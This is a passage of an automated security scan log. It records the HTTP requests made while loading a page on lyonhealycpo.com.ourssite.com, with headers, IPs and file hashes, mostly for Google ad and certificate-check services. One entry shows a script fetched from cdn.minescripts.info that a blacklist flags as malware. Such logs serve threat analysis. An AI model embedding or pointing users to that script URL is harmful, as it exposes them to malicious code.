Sha256: 8eb9a093b3d57b4e750813aa8fc3c09cdc20379d6b5e1be2b862131bebfe735c
                                        
                                            GET /pagead/js/lidar.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Mon, 12 Feb 2018 23:27:55 GMT
Expires: Tue, 13 Feb 2018 00:27:55 GMT
Etag: 6831844447556634063
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 34299
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=3600
Age: 2472
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   34299
Md5:    4af480d154ceb9d4226b2a21f80b6b9e
Sha1:   514b804d0a119a0063bfc1d9e20f7b7c7004d80c
Sha256: e45497d04a8eb2999ade55e5f45265811efc3e5ab7eaf6929db863b133d6f181
                                        
                                            GET /pixel?google_nid=appnexus&google_cm&google_sc&google_dbm HTTP/1.1 
Host: cm.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/xbbe/pixel?d=COD5IRDn0jYY0IC5CDAB&v=APEucNWlf2nVGD7QVqn66Y9lRVBTes5IRW2ASGQmTA-x3cafgloPSVroOCiqfOxveidCWavRsq4O
Cookie: IDE=AHWqTUk3Zb48UxGj_Y6vxFZL3xULrhsxEct8XVZHqAWEGVSQzA9nVOXYFfBfwiDZ

                                         
                                         172.217.20.34
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: https://ib.adnxs.com/setuid?entity=101&code=CAESEHIGjOk6oLPAsvxuQNTD784&google_cver=1
Date: Tue, 13 Feb 2018 00:09:07 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: HTTP server (unknown)
Content-Length: 290
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  HTML document text
Size:   290
Md5:    a955987830a231fc6bbf2827d0c3be6c
Sha1:   681be77c65b13e5733c744cfbfd695e484e889eb
Sha256: e8a862e6d4cc3eb96a3e32d24d8e43f2ffbbef617ff1946229d749220dc4434b
                                        
                                            GET /s2/favicons?domain_url=camping-muenstertal.de HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:07 GMT
Date: Tue, 13 Feb 2018 00:09:07 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGB, non-interlaced
Size:   489
Md5:    ab62c136b301e7944f01237b8bae47c1
Sha1:   11d315415e0c349195ea1b36b714b6243c4fe9a1
Sha256: 334823dd8f9f3767f6f005ee280221313fc5081ef3a94153f97eb0f16496a6a6
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:09:07 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    51359cd6451a38e17b3e782c0f24b8a4
Sha1:   4d0e80cd2082cd7cec99aa621d3f0604fdcca4a8
Sha256: 5feb9f6ba150552880b2734cce6440336c3a995b86bd351dc5cf8eb94a2e3a48
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=172800
Date: Tue, 13 Feb 2018 00:09:07 GMT
Etag: "5a81cf1d-1d7"
Expires: Thu, 15 Feb 2018 00:09:07 GMT
Last-Modified: Mon, 12 Feb 2018 17:30:05 GMT
Server: ECS (arn/4694)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    507449f6b7a2cbb94a3fb1ebbbfa9d30
Sha1:   947ea7a6834b83d37ec73be9fc6b157898af4b92
Sha256: 3fc52d889676dbd8bf0fae964ad0fcb3c5eaff5d80107f536b6a96f2ba71fbc1
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=172800
Date: Tue, 13 Feb 2018 00:09:07 GMT
Etag: "5a81cf26-1d7"
Expires: Thu, 15 Feb 2018 00:09:07 GMT
Last-Modified: Mon, 12 Feb 2018 17:30:14 GMT
Server: ECS (arn/459B)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    2e6a602534a16b79022ccde23e50ecb0
Sha1:   d76d5301281efcef266cca48fed629cd3c9c1606
Sha256: 632b38ea120b010f2e29fe15b92536d7804e1e05882b5d314066f0eea4d7b384
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         178.255.83.1
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:09:07 GMT
Server: Apache
Last-Modified: Mon, 12 Feb 2018 17:56:39 GMT
Expires: Mon, 19 Feb 2018 17:56:39 GMT
Etag: 6E1390A0BD1EA29D9D3CAFC2B28D81858CED524B
Cache-Control: max-age=581851,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp19
Content-Length: 278
Connection: close


--- Additional Info ---
Magic:  data
Size:   278
Md5:    c9d0f8a0c103fd3f76a3231d292019e3
Sha1:   6e1390a0bd1ea29d9d3cafc2b28d81858ced524b
Sha256: c2561fc07b4706316266d5a4d9b40e09479226c56d94d7fc92effeb96bf25de1
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         178.255.83.1
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:09:07 GMT
Server: Apache
Last-Modified: Mon, 12 Feb 2018 11:30:53 GMT
Expires: Mon, 19 Feb 2018 11:30:53 GMT
Etag: 8E242477BF0882B1319BC4C53887CEDD2AF131E2
Cache-Control: max-age=558705,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp19
Content-Length: 313
Connection: close


--- Additional Info ---
Magic:  data
Size:   313
Md5:    f5c0f9572b3e8f64a0cbc1a07f453401
Sha1:   8e242477bf0882b1319bc4c53887cedd2af131e2
Sha256: 32ad01098f31aba2f0060dc68180378325772eea6370174e99e0d1f6131978f4
                                        
                                            GET /sodar/V6zvOIoD.js HTTP/1.1 
Host: tpc.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.20.33
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 15146
Date: Thu, 08 Feb 2018 18:52:04 GMT
Expires: Fri, 08 Feb 2019 18:52:04 GMT
Last-Modified: Tue, 02 Jan 2018 21:45:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 364623
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   15146
Md5:    6a56e1d1c9c0c105245cbce244c876f3
Sha1:   6613490ab3735f37499d311c6efba3f689ec4abb
Sha256: ad20ef401ac229a0ab07b057ed9350c85816118a662c7cfa240fa5cd86c718f0
                                        
                                            GET /s2/favicons?domain_url=processforce.eu HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:07 GMT
Date: Tue, 13 Feb 2018 00:09:07 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   475
Md5:    9652cb7d7b7b4306285461d6dbbc1b83
Sha1:   d29e16a22d0a2040a94349a4bac372864d2841e0
Sha256: c4efa9a55d3ff82c9c70818268ea43e51cf5b7e529c12d7158b37e1760be36bd
                                        
                                            GET /c/8kzd.js HTTP/1.1 
Host: cdn.minescripts.info
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         104.18.46.158
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 13 Feb 2018 00:09:07 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dbc1a567ad34a821c3c9f3976908319e41518480547; expires=Wed, 13-Feb-19 00:09:07 GMT; path=/; domain=.minescripts.info; HttpOnly
Last-Modified: Mon, 12 Feb 2018 15:25:57 GMT
Etag: W/"5a81b205-26a1a"
Expires: Tue, 13 Feb 2018 04:09:07 GMT
Cache-Control: public, max-age=14400
Access-Control-Allow-Origin: *
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 3ec38e9f5d9642bb-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   39530
Md5:    6a1d4bd6428bfbab9a585ac42d984afe
Sha1:   c4cf4bf803d5cc58ab4c9bd9136680c1ad1b6e40
Sha256: 2f12a4910892765ca5b443af95e07f40ed2fc2c32a6b4b792209644d468e93dd

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /sodar/6uQTKQJz.html HTTP/1.1 
Host: tpc.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.20.33
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7233
Date: Thu, 08 Feb 2018 18:52:05 GMT
Expires: Fri, 08 Feb 2019 18:52:05 GMT
Last-Modified: Tue, 02 Jan 2018 21:45:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 364622
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   7233
Md5:    30bf1c51eb9c0ba258ea2df31d24bc98
Sha1:   d13abffacc94ee31dfd5a094bfa975cca8e4d292
Sha256: 25a3afe99572ebbe3af74f504252d7fe97ebd580d47f5b734c286cc40a82131e
                                        
                                            POST / HTTP/1.1 
Host: rc.symcd.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         23.52.27.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx/1.12.2
Content-Length: 1034
Content-Transfer-Encoding: binary
Cache-Control: max-age=400758, public, no-transform, must-revalidate
Last-Modified: Sat, 10 Feb 2018 15:25:41 GMT
Expires: Sat, 17 Feb 2018 15:25:41 GMT
Date: Tue, 13 Feb 2018 00:09:07 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1034
Md5:    baf34d986c00b66407375ac23eec7499
Sha1:   4451f614115ab7a166b37973aafa4dcae9e2a93f
Sha256: ac2f7c04a4378ed2d8a2a21de045d89445cf8eab3c7bf989ea332c181f7c56b2
                                        
                                            GET /s2/favicons?domain_url=tampahispano.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:07 GMT
Date: Tue, 13 Feb 2018 00:09:07 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   786
Md5:    44b7cf8d7dd231ee8ea698c946b5177a
Sha1:   27f96ae419ba19772ec99389e1bf9cdcfc63ac3e
Sha256: ef3260cc83d0d67ceffa56359d56326e11f26cc0470580a69061655532aa64f1
                                        
                                            GET /pagead/js/r20180207/r20110914/activeview/osd_listener.js HTTP/1.1 
Host: tpc.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.20.33
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Wed, 07 Feb 2018 14:02:17 GMT
Expires: Wed, 21 Feb 2018 14:02:17 GMT
Etag: 4319863517479632446
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 29527
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 468410
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   29527
Md5:    cb7c5d42c8b00cdec8b3bfb65909c20b
Sha1:   df39b61e2fd957f8b9ade02e65c59ec51cec5c46
Sha256: 03d445b71e38084066abf9967c78418aaac7f1617d7251bd648485f07c6379e0
                                        
                                            GET /pagead/js/r20180207/r20110914/client/ext/m_qs_click_protection.js HTTP/1.1 
Host: tpc.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
